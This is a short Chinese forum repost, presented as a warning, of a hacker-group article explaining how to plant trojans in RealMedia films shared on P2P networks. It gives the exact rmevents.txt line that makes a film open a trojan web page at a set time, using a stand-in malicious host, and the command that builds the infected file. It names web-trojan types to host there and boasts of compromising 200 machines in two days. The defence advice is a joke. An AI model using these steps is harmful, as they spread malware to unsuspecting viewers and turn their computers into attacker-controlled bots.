Real影片木马介绍

昨天不甚中了木马，最后查了好半天才发现木马是通过我看的电影溜进我家的。现在的病毒真是防不胜防。

我把影片木马的介绍贴一下，大家以后也要小心了，如果在看电影的时候，无缘弹出网页，就要注意了！

文章作者：intruder
信息来源：邪恶八进制 中国

在P2P软件里,很多的Real影片都是危险的,这只是一个小技巧,辅助的一种入侵方式，但这种方法很有效果，比如在著名的A片交流软件PP点点通里，我下了一个这样的小木马，两天就有200个肉鸡，并且呈几何状增长.大家别做坏事。

使用Helix Producer Plus 9的rmevents.exe来修改影片的剪辑信息,可以在指定时间打开指定的窗口.
新建一个文本文件rmevents.txt.
输入：
u 00:01:00.0 00:01:30.0 http://www.muma.com.cn/muma.html
我来解释一下，它意思是说在00:01:00.0 00:01:30.0这个时间范围内打开后面的URL，后面的URL就是我们的木马地址。
输入rmevents -i 电影.rm -e rmevents.txt -o 电影1.rm 这个命令，生成的电影.rm就是我们的木马文件了。

http://www.muma.com.cn/muma.html这个地址是你做好的网页木马的地址，不管是动鲨木马啊，还是EXE2BMP的木马，还是什么CHM木马,还是我崇拜的冰狐大哥的IFRAME溢出的网页木马.rar都可以。主要是新，威力强。

大家可以试一下。呵呵，intruder原创。本文暂时不允许被其他网站转载，只作为E.S.T的兄弟间的交流。谢谢。


防御方法更简单，嘿嘿，不看电影就没事了。要不就不用Realpalyer看吧，换别的播放器。